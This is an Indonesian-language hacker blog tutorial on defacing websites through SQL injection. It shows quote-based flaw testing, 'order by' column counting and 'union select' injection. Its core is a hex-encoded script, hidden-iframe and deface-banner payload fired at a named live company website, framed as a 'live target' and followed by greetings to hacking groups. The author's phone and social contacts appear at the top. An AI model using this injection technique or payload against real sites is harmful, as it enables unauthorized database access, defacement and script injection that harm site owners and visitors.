Cara Poc Deface Solved SQL Print Nick + Image Live Target with DIOS| LXI - 2019

Assalamualaikum Wr.Wb.

{{{Whatsapp The_N4R4NT}}}

-->http://wa.me/6283111791760<--

{{{Instagram The_N4R4NT}}}

-->https://instagram.com/the_n4r4nt<--

Balik lagi bersama gw yekan :v admin yang paling gans diseluruh dunia The_N4R4NT.Oke pada kali ini saya akan kasih tutorial cara Proof SQL inj Print Nick + Image.Dan langsung saja gausah banyak bacot ya ajg :v

Bahan yang kalian butuhkan adalah :

1.Dork

2.Tool encrypt code sc kalian (Gambar + Nick)

3.Dios

Bahan Bahanya saya kasih disini semua

-->Pencet Ini<--

Untuk mengetahui vuln atau tidak nya beri tanda (') dibelakang angka (-) didepan angka

Ciri-ciri vuln nya nanti blank putih atau ada tulisan "you have an error with MySQL Syntax" / gambar hilang kira kira begitu

Catatan: (') akan berubah menjadi %27,

Jika ada kata "Invalid query: Unknown column '(angka)' in 'order clause'" maka angka ajaib ada di angka sebelum itu

Jika vuln langsung kita order saja cari angka ajaib, di target ini saya menemukan vuln dengan ('), cara ordernya "+order+by+1--+-" dibelakang nya

Contoh: http://site/readnews.php?id=4+order+by+1--+-

Lakukan order dengan mengganti angka di bagian "order+by+(ganti angkanya sampai ketemu vulnya)"

Lanjut Enter

Nah pada target kali ini vulnya ada di angka 6

Contoh http://site/readnews.php?id=4+order+by+6--+-

Seperti itu contoh Vulnerabilityny

•Nah jika sudah ketemu angka vulnnya lalu kita cari angka togel gel gelek nya :v dengan cara

"union+select+1,2,3,4,5.....sampai angka vulnnya-1"

•Contoh ini kan live targetnya vuln di angka sembilan jadi 6-1=5 and then kita union sampai 5

Contoh -> http://site/readnews.php?id=4+union+select+1,2,3,4,5--+- <-

•Nah di live target ini muncul angka 2,3,4

•Nah sekarang kita masukan Hex Encode tadi di angka ajaibnya dengan cara 

Masukan concat(0x angka hexnya tadi)

Contoh : http://www.kabelindo.co.id/readnews.php?id=4+union+select+1,concat(0x3c7363726970743e20616c6572742822496e6a6563746564204279205468655f4e3452344e5422293b3c2f7363726970743e3c696672616d652077696474683d223022206865696768743d223022207372633d2268747470733a2f2f682e746f7034746f702e696f2f6d5f31363239647273396a302e6d703322206672616d65626f726465723d22302220616c6c6f7766756c6c73637265656e20223122206c6f6f703e3c2f696672616d653e3c63656e7465723e3c696d67207372633d2268747470733a2f2f692e6962622e636f2f474853637054342f32303230303631372d3233313831352e6a706722206865696768743d223430307078222077696474683d223430307078223e3c62723e57617320496e6a65637420416e642054616b656e20427920332042524f544845523c2f62723e3c63656e7465723e3c666f6e7420666163653d226d6f6e6f73706163652220636f6c6f723d22726564222073697a653d2233223e5468655f4e3452344e54202d204834564b5f443356314c35202d20446576696c6b754043433c2f666f6e743e3c68313e4c6f6c7a53656320582d506c6f697420496e646f3c2f68313e3c2f63656e7465723e3c63656e7465723e3c68313e496e646f6e657369616e2053656375726974793c2f68313e3c2f63656e7465723e3c63656e7465723e3c68313e4d616c616e672047726579204861743c2f68313e3c2f63656e7465723e3c63656e7465723e3c68313e536174616e696320446576696c204f6666696369616c3c2f68313e3c2f63656e7465723e),3,4,5--+-

Dan jadinya......

1 Tap again :v

And Dor :v

Okeh sekian saja materi dari saya admin gans,jikala saya mempunyai salah mohon maafkan dari perkataan yang kurang berkenan,kami sebagai :

-The_N4R4NT

-RebelSuck

Greetz

-LolzSec X-Ploit Indo Official

-Satanic Devil Official

-Malang Grey Hat

-Indonesian Security

-Bangkalan X-Ploit

-GC attacker diluar sana :v

Kami pamit undur diri,Wassalamualaikum Wr.Wb.

Jangan lupa Tinggalkan komen yaaa

Kontak Saya ada diatas sendiri!

Share this post